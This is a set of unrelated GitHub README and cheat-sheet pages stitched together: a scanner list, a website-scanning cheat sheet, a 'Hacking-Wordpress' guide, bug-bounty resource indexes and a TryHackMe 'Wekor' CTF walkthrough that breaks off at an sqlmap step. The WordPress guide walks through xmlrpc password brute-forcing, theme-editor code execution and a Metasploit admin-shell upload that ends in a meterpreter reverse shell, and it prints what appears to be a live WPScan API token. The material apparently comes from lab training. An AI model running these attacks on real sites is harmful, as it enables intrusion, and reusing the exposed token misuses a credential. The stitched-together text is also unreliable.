> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-BashShell-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Neo23x0/Fenrir?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Neo23x0/Fenrir?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Neo23x0/Fenrir?style=flat-square) ![GitHub](https://img.shields.io/github/license/Neo23x0/Fenrir?style=flat-square)
***
## Why Create This Collection?
The purpose of this collection is to provide various types of open-source security scanners that can help companies to be more safer.
## Commit Symbolic Description
**[↑scanner]xxx** means **update scanner info**<br>
**[+scanner]xxx** means **add scanner**<br>
**[-scanner]xxx** means **remove scanner**<br>
**[+category]xxx** means **add scanner category**<br>
**[-category]xxx** means **remove scanner category**<br>
**[+contributor]xxx** means **add someone to acknowledgments**<br>
**[↑contributor]xxx** means **update someone's info for acknowledgments**<br>
**[↑other]xxx** means **other actions**<br>
## Authors
**Wester**(Twitter <a href="http://twitter.com/wester0x01">@Zhiyang Zeng</a>) & **Martin**(Twitter <a href="https://twitter.com/yuyangchow">@Martin Chow</a>)
## Legal Disclaimer
The scanners provided by this project are for research and study purposes only, and you must obey the laws and regulations of your country during use. If you are a Chinese citizen, please ensure you are obedient to *The Cyber Security Law of the People's Republic of China*, and please do not break the article 286 of *the Criminal Law of the People's Republic of China* for the regulation on the crime of destroying computer systems. At last, I would like to point out to you that you must be fully held responsible duty for any consequence that may arise.
## How to contribute?
If you have any questions about this project ,or you have found some valuable scanners, please feel free to tell us :)
## License
The content of this Repository is released under the [<CC BY-NC-ND 4.0>](https://creativecommons.org/licenses/by-nc-nd/4.0/deed.en) license.
## Copyright
It's happy to see that this repository has been widely spreaded in information security community, but I hope everyone could at all times respect knowledge and our efforts, so please specify reproduced from https://github.com/We5ter/Scanners-Box in your articles, and please do not republish this article for profit.
## Acknowledgments
We would like to thanks the following security researchers for their valuable feedbacks amd suggestions.
- **@0c0c0f**
- **@藏形匿影**
- **@Mottoin team**
- **@BlackHole**
- **@CodeColorist**
- **@3xp10it**
- **@re4lity**
- **@s0md3v**
- **@boy-hack**
- **@marsII**
- **@tom0li**
- **@hksanduo**
- **@alexlauerman**
- **@MedivhMT**
- **@TideSec**
- **@0xHJK**
- **@j3ssie**
- **@Luci-d**
- **@cnlnn**
- **@yunxu1**
- **@saeeddhqan**
- **@Sofiane Lounici**
- **Owen Garrettz@deepfence**
## Stargazers
[![Stargazers over time](https://starchart.cc/We5ter/Scanners-Box.svg)](https://starchart.cc/We5ter/Scanners-Box)
©<a href="https://github.com/monsterzer0" target="_blank">Monster Zero Team</a> 2023
|
## What's this repository about?
This repository tries to explain what Prototype Pollution is and will try to give you a few examples on how to use it in certain use-cases.
- [What is prototype pollution?](/prototype-pollution.md)
- [Gunship (HackTheBox challenge) based on Prototype Pollution.](/gunship-walkthrough.md)
## License
**Please note:
The Gunship challenge source code included in this repo is attributed to HackTheBox (https://www.hackthebox.com/).**
My write-ups and notes are published under [Creative Commons BY-NC-SA 4.0 license](https://creativecommons.org/licenses/by-nc-sa/4.0/). Which says, "This license lets others remix, tweak, and build upon your work non-commercially, as long as they credit you and license their new creations under the identical terms."
![CC BY-NC-SA license](https://mirrors.creativecommons.org/presskit/buttons/88x31/png/by-nc-sa.png)
|
# #pwd:
#/lifesfun101/Offensive_Security
# #whoami
I'm a young information security professional who enjoys tough problems to solve and new challenges to take on. I have graduated from college with Information Security Degree and have always been fascinated with this area of Information Technology. In the past I have been on the defensive side of security, working in a Security Operations Center as a Security Analyst.
So far I have 2 certificates under my belt which are OSCP and CISSP (Associate). I enjoy a good challenging box from hackthebox and from vulnhub. I follow many security pages on reddit and attend local security meetups.
# #man
This repository is dedicated to offensive security. I started my journey on that path in February, 2019.
I don't claim to be an expert in this field. I'm just an enthusiast who would like to help others on the same journey. Throughout this repository I will be sharing things I found useful myself. These "things" will include:
* variety of tools
* variety of tactics
* variety scripts I wrote
* variety of scripts someone else wrote and I found useful (with appropriate creditation)
* [walkthrough](https://github.com/lifesfun101/Offensive-Security/tree/master/Walkthroughs) tutorials to vulnerable systems from Vulnhub and HackTheBox
* links to other pages that I stumbled upon in my journey and found helpful
* and other [helpful material](https://github.com/lifesfun101/Offensive-Security/tree/master/Helpful%20Material)
Currently I am working on [OSCP Preparation Manual](https://github.com/lifesfun101/Offensive-Security/blob/master/Helpful%20Material/OSCP%20Preparation%20Manual.md)
I really hope my contributions on this page will help others along the way and save them quite some time as well
|
# Website scan
**Summery:**
- [Website scan](#website-scan)
- [Nmap](#nmap)
- [Scan for cms](#scan-for-cms)
- [WebSite Scanning](#website-scanning)
- [Dico list](#dico-list)
- [Commands](#commands)
- [Check for backup files](#check-for-backup-files)
- [403 Bypasser](#403-bypasser)
- [Fuzzer](#fuzzer)
- [Fuzz parameters - arjun](#fuzz-parameters---arjun)
- [Wfuzz](#wfuzz)
- [HeartBleed](#heartbleed)
- [Proxy](#proxy)
- [Zaproxy](#zaproxy)
- [Check multiple page](#check-multiple-page)
- [Detect WAF](#detect-waf)
- [cURL](#curl)
- [Security.txt](#securitytxt)
- [Index page](#index-page)
- [Discovery - Favicon](#discovery---favicon)
- [OSINT](#osint)
- [Google dorks](#google-dorks)
- [Wayback Machine](#wayback-machine)
## Nmap
```sh
nmap -p 80 -vv --script=http-enum.nse,http-methods.nse,http-majordomo2-dir-traversal.nse,http-auth.nse,http-passwd.nse,http-php-version.nse,http-phpmyadmin-dir-traversal.nse,http-put.nse,http-apache-negotiation.nse,http-adobe-coldfusion-apsa1301.nse TARGET_IP
```
## Scan for cms
> Cmsmap
CMSmap is a CMS scanner that automates the process of detecting security flaws of the most popular CMSs.
```sh
cmsmap http://TARGET_IP:PORT
```
> Wpscan
The WPScan CLI tool is a black box WordPress security scanner
```sh
wpscan --url http://TARGET_IP:PORT
```
> Nikto
Nikto is an web server scanner which performs comprehensive tests against web servers for multiple
```sh
nikto -h http://TARGET_IP:PORT
```
> chameleon
```sh
chameleon --url http://TARGET_IP:PORT
```
> Whatweb
WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
```sh
whatweb -v -a 3 http://TARGET_IP:PORT
```
## WebSite Scanning
### Dico list
> Common
```list
/usr/share/dirbuster/wordlists/common.txt - Size 13 KiB
/usr/share/skipfish/dictionaries/complete.wl - Size 34 KiB
/usr/share/seclists/Discovery/Web-Content/common.txt - Size 36 KiB
```
> Directory
```list
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt - Size 244 KiB
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt - Size 2 MiB
/usr/share/dirbuster/wordlists/directory-list-2.3-big.txt - Size 15 MiB
```
> File
```list
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt - 219 KiB
/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt - 481 KiB
```
> Fuzz extension
```list
/usr/share/seclists/Discovery/Web-Content/web-extensions.txt - Size 206 B
/usr/share/skipfish/dictionaries/extensions-only.wl - Size 1 KiB
/usr/share/seclists/Discovery/Web-Content/raft-small-extensions.txt - Size 7 KiB
```
> Server Based
```list
/usr/share/seclists/Discovery/Web-Content/IIS.fuzz.txt - Size 4 KiB
/usr/share/seclists/Discovery/Web-Content/tomcat.txt - Size 2 KiB
/usr/share/seclists/Discovery/Web-Content/nginx.txt - Size 559 B
/usr/share/seclists/Discovery/Web-Content/apache.txt - Size 238 B
```
> Vhost
```list
/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt - Size 32 KiB
```
> Parameters
```list
/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt - Size 18 KiB
```
### Commands
> Skipfish
```sh
skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -u http://TARGET_IP:Port
```
> Dirsearch
```sh
dirsearch -u http://TARGET_IP:Port -e php,asp
```
> Gobuster
```sh
gobuster dir -t 10 -x .php,.html -e -s 200,204,301,302,307 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://TARGET_IP:Port
```
> feroxbuster
```sh
feroxbuster --url http://TARGET_IP:Port --depth 2
```
> Dirhunt
Dirhunt is a web crawler optimize for search and analyze directories. This tool can find interesting things if the server has the "index of" mode enabled.
```sh
dirhunt http://TARGET_IP:Port
```
### Check for backup files
Source: <https://github.com/mazen160/bfac.git>
```sh
bfac -u http://TARGET_IP:Port
```
> Exclude status-codes
```sh
bfac -u http://TARGET_IP:Port --exclude-status-codes 301,999
```
> Random user agent
```sh
bfac -u http://TARGET_IP:Port -ra
```
## 403 Bypasser
```sh
403bypasser.py -u http://TARGET_IP:Port -d /DIRECTORY
403bypasser.py -u http://TARGET_IP:Port -D dirlist.txt
```
## Fuzzer
### Fuzz parameters - arjun
```sh
arjun -u http://TARGET_IP:Port
```
> Custom dico
```sh
arjun -u http://TARGET_IP:Port -f /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
```
### Wfuzz
```sh
wfuzz -c -z file,'/usr/share/wfuzz/wordlist/Injections/All_attack.txt' http://TARGET_IP:Port/index.php?page=FUZZ
```
> If site in https
```sh
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://TARGET_IP:PORT/index.php?page=FUZZ
```
## HeartBleed
```sh
sslscan TARGET_IP
```
```sh
testssl TARGET_IP
```
```sh
openssl s_client -connect TARGET_IP:443
```
### Proxy
```sh
Burp
```
## Zaproxy
```sh
zaproxy
```
## Check multiple page
The file hosts has multiple different url :
www.test.com www.google.com ...
```sh
cat hosts |aquatone
```
## Detect WAF
> nmap
```sh
nmap -p80 --script http-waf-detect TARGET_IP
```
> wafw00f
```sh
wafw00f http://TARGET_IP
wafw00f https://TARGET_IP -v
```
## cURL
> File upload with cURL
```bash
curl -X PUT -d @FILE_TO_UPLOAD.txt http://TARGET_IP/FILE_TO_UPLOAD.txt -vv
```
> json
```bash
curl http://TARGET_IP -H 'Content-Type: application/json' -d '{ "username" : "root", "password" : "root" }'
```
> Cookie file
```bash
curl --cookie-jar cookies.txt http://TARGET_IP
```
> Follow redirection
```bash
curl -L http://TARGET_IP
```
> Only show the header
```bash
curl -I http://TARGET_IP
```
## Security.txt
This file is used to tell security researchers how they can disclose vulnerabilities for a website.
> Path
```url
http://IP_ADDRESS/.well-known/security.txt
```
> Link
```url
https://securitytxt.org
```
## Index page
```url
http://IP_ADDRESS/robots.txt
http://IP_ADDRESS/sitemap.xml
http://IP_ADDRESS/crossdomain.xml
http://IP_ADDRESS/clientaccesspolicy.xml
```
## Discovery - Favicon
> Favicon database
<https://wiki.owasp.org/index.php/OWASP_favicon_database>
> Get the favicon hash
```bash
curl http://IP_ADDRESS/favicon.ico | md5sum
```
## OSINT
### Google dorks
| Filter | Example | Description |
| :------- | :----------------- | :----------------------------------------------------------- |
| site | site:tryhackme.com | returns results only from the specified website address |
| inurl | inurl:admin | returns results that have the specified word in the URL |
| filetype | filetype:pdf | returns results which are a particular file extension |
| intitle | intitle:admin | returns results that contain the specified word in the title |
More info: <https://en.wikipedia.org/wiki/Google_hacking>
### Wayback Machine
<https://archive.org/web/>
|
# 🔥Hacking-Wordpress 🔥
![wordpress-hacking](https://user-images.githubusercontent.com/79256105/165776319-f7d73fb8-6bd9-4847-97da-461b641fbfe0.png)
# Basic Wordpress and Wordpress Structure
### 🔥Wordpress Structure 🔥
WordPress can be installed on a Windows, Linux, or Mac OSX host. For this module, we will focus on a default WordPress installation on an Ubuntu Linux web server. WordPress requires a fully installed and configured LAMP stack (Linux operating system, Apache HTTP Server, MySQL database, and the PHP programming language) before installation on a Linux host. After installation, all WordPress supporting files and directories will be accessible in the webroot located at /var/www/html.
Below is the directory structure of a default WordPress install, showing the key files and subdirectories necessary for the website to function properly.
tree -L 1 /var/www/html
├── index.php
├── license.txt
├── readme.html
├── wp-activate.php
├── wp-admin
├── wp-blog-header.php
├── wp-comments-post.php
├── wp-config.php
├── wp-config-sample.php
├── wp-content
├── wp-cron.php
├── wp-includes
├── wp-links-opml.php
├── wp-load.php
├── wp-login.php
├── wp-mail.php
├── wp-settings.php
├── wp-signup.php
├── wp-trackback.php
└── xmlrpc.php
## 👽 Key WordPress Files ♀️
The root directory of WordPress contains files that are needed to configure WordPress to function correctly.
index.php is the homepage of WordPress.
license.txt contains useful information such as the version WordPress installed.
wp-activate.php is used for the email activation process when setting up a new WordPress site.
wp-admin folder contains the login page for administrator access and the backend dashboard. Once a user has logged in, they can make changes to the site based on their assigned permissions. The login page can be located at one of the following paths:
/wp-admin/login.php
/wp-admin/wp-login.php
/login.php
/wp-login.php
This file can also be renamed to make it more challenging to find the login page.
xmlrpc.php is a file representing a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress REST API.
WordPress Configuration File
## WordPress Configuration File
The wp-config.php file contains information required by WordPress to connect to the database, such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.
wp-config.php
Code: php
<?php
/** <SNIP> */
/** The name of the database for WordPress */
define( 'DB_NAME', 'database_name_here' );
/** MySQL database username */
define( 'DB_USER', 'username_here' );
/** MySQL database password */
define( 'DB_PASSWORD', 'password_here' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Authentication Unique Keys and Salts */
/* <SNIP> */
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
/** WordPress Database Table prefix */
$table_prefix = 'wp_';
/** For developers: WordPress debugging mode. */
/** <SNIP> */
define( 'WP_DEBUG', false );
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
# Key WordPress Directories
The wp-content folder is the main directory where plugins and themes are stored. The subdirectory uploads/ is usually where any files uploaded to the platform are stored. These directories and files should be carefully enumerated as they may lead to contain sensitive data that could lead to remote code execution or exploitation of other vulnerabilities or misconfigurations.
#### WP-Content
tree -L 1 /var/www/html/wp-content
├── index.php
├── plugins
└── themes
#### WP-Includes
wp-includes contains everything except for the administrative components and the themes that belong to the website. This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.
tree -L 1 /var/www/html/wp-includes
├── theme.php
├── update.php
├── user.php
├── vars.php
├── version.php
├── widgets
├── widgets.php
├── wlwmanifest.xml
├── wp-db.php
└── wp-diff.php
# WordPress User Roles
There are five types of users in a standard WordPress installation.
Role Description
Administrator This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code.
Editor An editor can publish and manage posts, including the posts of other users.
Author Authors can publish and manage their own posts.
Contributor These users can write and manage their own posts but cannot publish them.
Subscriber These are normal users who can browse posts and edit their profiles.
Gaining access as an administrator is usually needed to obtain code execution on the server. However, editors and authors might have access to certain vulnerable plugins that normal users do not.
# 🥇Enumeration Procedure For Wordpress Website in Manually
### Wordpress Version Check
Check Wordpress Version using given below curl command or seeing source code
commnad:
curl -s -X GET http://blog.inlanefreight.com | grep '<meta name="generator"'
Also check WP Version - CSS and WP Version - JS version from Source Code
### ▶️ Plugins and Themes Enumeration
Commnad For Plugins:
curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2
Command For Themmes:
curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2
#### ⏩ User Enumeration
Enumerating a list of valid users is a critical phase of a WordPress security assessment. Armed with this list, we may be able to guess default credentials or perform a brute force password attack. If successful, we may be able to log in to the WordPress backend as an author or even as an administrator. This access can potentially be leveraged to modify the WordPress website or even interact with the underlying web server.
Command :
curl http://blog.inlanefreight.com/wp-json/wp/v2/users
# ⤵️Enumeration Procedure For Wordpress Website in Automatically Using wpscan
WPScan is an automated WordPress scanner and enumeration tool. It determines if the various themes and plugins used by a WordPress site are outdated or vulnerable. It is installed by default on Parrot OS ,Kali OS but can also be installed manually with gem
gem install wpscan
Once the installation completes, we can issue a command such as ***wpscan*** --hh to verify the installation. This command will show us the usage menu with all of the available command-line switches available.
### 🔥Enumerating a Website with WPScan ⚛️
The --enumerate flag is used to enumerate various components of the WordPress application such as plugins, themes, and users. By default, ***WPScan enumerates vulnerable plugins, themes, users, media, and backups***. However, specific arguments can be supplied to restrict enumeration to specific components. For example, all plugins can be enumerated using the arguments --enumerate ap. Let's run a normal enumeration scan against a WordPress website.
Command :
wpscan --url http://blog.inlanefreight.com --enumerate --api-token api-token-value
Example :
wpscan --url http://10.129.2.37/ --enumerate --api-token cs0QRHwsYE6RvLd6SaHDhI1dmNX8ZVLEx0Fb7mNid9s
##### 👀Note: Api Token Generator Link https://wpscan.com/
# ✔️ Exploiting a Vulnerable Plugin
If we are checking and testing properly of our target wordpress website and if target wordpress website is vulneable we will see some CVE or Exploite information after using above wpscan command
### ☑️WordPress User Bruteforce
WPScan can be used to brute force usernames and passwords. The tool uses two kinds of login brute force attacks, xmlrpc and wp-login. The wp-login method will attempt to brute force the normal WordPress login page, while the xmlrpc method uses the WordPress API to make login attempts through /xmlrpc.php. The xmlrpc method is preferred as it is faster.
Command :
wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt --url http://blog.inlanefreight.com
#### 👁️Note: use username and password in http://sitename/login path
# 🔥Remote Code Execution (RCE) via the Theme Editor 🔥
With administrative access to WordPress, we can modify the PHP source code to execute system commands. To perform this attack, log in to WordPress with the administrator credentials, which should redirect us to the admin panel. Click on Appearance on the side panel and select Theme Editor. This page will allow us to edit the PHP source code directly. We should select an inactive theme in order to avoid corrupting the main theme.
# 🔥Attacking WordPress with Metasploit 🔥
We can use the Metasploit Framework (MSF) to obtain a reverse shell on the target automatically. This requires valid credentials for an account that has sufficient rights to create files on the webserver.
###### To obtain the reverse shell, we can use the wp_admin_shell_upload module. We can easily search for it inside MSF:
msf5 > search wp_admin
###### Matching Modules
0 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
###### Module Selection:
msf5 > use 0
msf5 exploit(unix/webapp/wp_admin_shell_upload) >
###### Module Options
msf5 exploit(unix/webapp/wp_admin_shell_upload) > options
##### Module options (exploit/unix/webapp/wp_admin_shell_upload):
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 WordPress
#### set and Exploitation
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.com
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password Winter2020
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.16.8
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run
meterpreter > getuid
Server username: www—data (33)
## 🙏Practicing Sites:
https://tryhackme.com/room/allinonemj
https://tryhackme.com/room/wordpresscve202129447
https://tryhackme.com/room/blog
## 🎆 Website Security Testing Site:
https://sitecheck.sucuri.net/
## 💠 Happy Hackings 🔡
## ℹ️ Source: Hack The Box Accademy and Try Hack Me 🔽
|
# SetupHelpDesk(Under Development)
Index | Contents
--- | ---
ResetHAcker | [HAcker Daily Utility and OSINT](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/setup/HackersUtilities.md)
Crhuber | [Linix Cheetsheet ](https://github.com/crhuber/linux-cheatsheet)
0xblackbird - Developer Tools | [Developer Tools for bugbounty hunters](https://0xblackbird.github.io/blog/post4)
Hakluke | [How-to-exit-vim](https://github.com/hakluke/how-to-exit-vim)
Nahamsec - Recon_profile | [Create easy aliases to run via an SSH/terminal.](https://github.com/nahamsec/recon_profile)
Nahamsec - BugBounty Tookit| [BBHT is a script to install the most popular tools](https://github.com/nahamsec/bbht)
Aseem Shrey - Bug bounty Setups in any VPS | [Quick script to install and setups Setup Bug Bounty Tools on AWS instance / any VPS for that matter](https://gist.github.com/LuD1161/66f30da6d8b6c1c05b9f6708525ea885)
HackerSploit - Docker for Bug Hunters | [Docker For Pentesting & Bug Bounty Hunting](https://www.youtube.com/watch?v=rfXadJ72dhg)
Phoenixnap - Hyper-V for Bug Hunters |[Hyper-v configuration and install ubuntu](https://phoenixnap.com/kb/hyper-v-ubuntu)
Vikram - BB_Setup in Windows(WSL2) | [Bug bounty setup in Window 10 & 11 with WSL2 ](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/BB_Setup%20in%20WSL2)
Vikram - Burpsuite Setup and useses | [Penetration Testing with Burp (ft.: Raj chandel's blog and @Ignitetechnologies)](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/burpsuite.md)
Updating - Pentesting setup in VM machine
Updating - Pentesting setup in VMware
-------------------------------------------------------------------------------------------------------------------------------------------------------------
Index | Contents
--- | ---
Sleeplessbeastie's Notes | [Install CouchDB](https://sleeplessbeastie.eu/2020/03/20/how-to-install-couchdb/)
Raj Chandel - Cloud Computing Setup | [Penetration Testing Lab Setup: Apache2, MariaDB Server,PHP and its modules, Create OwnCloud Database setup and configuration using Ubuntu, docker and VM](https://www.hackingarticles.in/penetration-testing-lab-setupcloud-computing/)
Raj Chandel - Web Server Lab Setup | [Penetration Testing Lab Setup: Apache, PHP, MySQL, phpMyAdmin setup and configuration using Ubuntu, docker and VM](https://www.hackingarticles.in/web-server-lab-setup-for-penetration-testing/)
Jayson Grace - GCP Setups | [DevSecOps lab SetUp:Install gcloud on MacOS & Ubuntu](https://techvomit.net/gcp-cheatsheet/)
Jayson Grace - AZURE Setups | [DevSecOps lab SetUp:Install AZURE CLI on MacOS & Linux](https://techvomit.net/azure-cheatsheet/)
Jayson Grace - Elasticsearch Setup | [DevSecOps lab SetUp:Install Elasticsearch - a search engine based on the Lucene library.](https://techvomit.net/elk/)
Raj Chandel - Jenkin Steup | [DevSecOps Lab Setup:Install Java and setup Jenkin in Ubuntu](https://www.hackingarticles.in/penetration-testing-lab-setup-jenkins/)
Jayson Grace - Password Managers Setups | [DevSecOps Lab Setup:Install Keeper CLI client & LastPass](https://techvomit.net/password-managers/)
Jayson Grace - Terraform Setup | [DevSecOps Lab Setup:Install Terraform on Ubuntu 20.04](https://techvomit.net/terraform-cheatsheet/)
Raj Chandel - Apache Tomcat setup | [Penetration Testing Lab Setup:Tomcat on any Linux Machine](https://www.hackingarticles.in/penetration-testing-lab-setuptomcat/)
Raj Chandel - Memcached lab setup | [Penetration Testing Lab Setup: pen-testing in Memcached (Ubuntu 18.04.) ](https://www.hackingarticles.in/penetration-testing-lab-setup-memcached/)
Raj Chandel - Web Proxy Lab Setup Testing using Squid | [Penetration Testing Lab Setup: Squid Proxy](https://www.hackingarticles.in/penetration-testing-lab-setup-squid-proxy/))
Raj Chandel - Microsocks Lab setup | [Penetration Testing Lab Setup: Microsocks](https://www.hackingarticles.in/penetration-testing-lab-setup-microsocks/)
Raj Chandel - telnetd Setup & configure | [Penetration Testing on Telnet (Port 23)](https://www.hackingarticles.in/penetration-testing-lab-setuptomcat/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------
Index | Policy , Guide, benchmarks etc Contents
--- | ---
Consortium for Educational Communication(CEC) | [Cyber Laws in India -](https://www.youtube.com/watch?v=Vbqi0z_48bA)
Edoverflow | [A Deeper Look at Hacking Laws - video ](https://www.youtube.com/watch?v=Q5kIdpPIVuY)
Philippe Lagadec - security hardening guides | [A collection of awesome security hardening guides, best practices, checklists, benchmarks, tools and other resources.](https://github.com/decalage2/awesome-security-hardening)
|
# tips
顾名思义,收集国内外各大佬的奇淫技巧
1. [bugbountytips.me](http://bugbountytips.me/)
>> github url: https://github.com/gwen001/bugbountytips
2. [mark-zh/BugBountyTips](https://github.com/mark-zh/BugBountyTips)
3. [KingOfBugbounty/KingOfBugBountyTips](https://github.com/KingOfBugbounty/KingOfBugBountyTips)
4. [dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty)
5. [devanshbatham/Awesome-Bugbounty-Writeups](https://github.com/devanshbatham/Awesome-Bugbounty-Writeups)
6. [hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons)
7. [punishell/bbtips](https://github.com/punishell/bbtips)
8. [Neelakandan-A/BugBounty_CheatSheet](https://github.com/Neelakandan-A/BugBounty_CheatSheet)
9. [giteshnxtlvl/YourNextBugTip](https://github.com/giteshnxtlvl/YourNextBugTip)
10. [MD15/AllAboutBugBounty](https://github.com/MD15/AllAboutBugBounty)
11. [Google Hacking Database](https://www.exploit-db.com/google-hacking-database)
|
# Wekor
CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;)
Hey Everyone! This Box is just a little CTF I've prepared recently. I hope you enjoy it as it is my first time ever creating something like this !
This CTF is focused primarily on enumeration, better understanding of services and thinking out of the box for some parts of this machine.
Feel free to ask any questions...It's okay to be confused in some parts of the box ;)
Just a quick note, Please use the domain `wekor.thm` as it could be useful later on in the box ;)
# User flag
## Nmap scan
Let's add the domain, as instructed:
~~~
┌──(kali㉿kali)-[/data/Wekor]
└─$ echo "10.10.207.93 wekor.thm" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.207.93 wekor.thm
~~~
Nmap reveals 2 open ports:
~~~
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 95:c3:ce:af:07:fa:e2:8e:29:04:e4:cd:14:6a:21:b5 (RSA)
| 256 4d:99:b5:68:af:bb:4e:66:ce:72:70:e6:e3:f8:96:a4 (ECDSA)
|_ 256 0d:e5:7d:e8:1a:12:c0:dd:b7:66:5e:98:34:55:59:f6 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 9 disallowed entries
| /workshop/ /root/ /lol/ /agent/ /feed /crawler /boot
|_/comingreallysoon /interesting
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
~~~
## Robots.txt
Starting with the web port, the `robots.txt` file reveals several locations:
~~~
User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting
~~~
Most of the locations lead to 404 errors, but 1:
~~~
┌──(kali㉿kali)-[/data/Wekor]
└─$ for i in `curl -s http://wekor.thm/robots.txt | grep Disallow | cut -d " " -f2`;do echo $i;curl -I http://wekor.thm$i;echo "---";done
/workshop/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/root/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/lol/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/agent/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/feed
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/crawler
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/boot
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/comingreallysoon
HTTP/1.1 301 Moved Permanently
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: http://wekor.thm/comingreallysoon/
Content-Type: text/html; charset=iso-8859-1
---
/interesting
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
~~~
Browsing `http://wekor.thm/comingreallysoon/` discloses a new location: `/it-next`:
~~~
┌──(kali㉿kali)-[/data/Wekor]
└─$ curl -s http://wekor.thm/comingreallysoon/
Welcome Dear Client!
We've setup our latest website on /it-next, Please go check it out!
If you have any comments or suggestions, please tweet them to @faketwitteraccount!
Thanks a lot !
~~~
## SQL Injection
There are many pages in this website. Checking all pages where forms are available led me to a SQL injection vulnerability in the `it_cart.php` page. Intercept the page with BurpSuite, save the POST request as `ìt_cart_coupon.xml` and use `sqlmap` to dump the database:
~~~
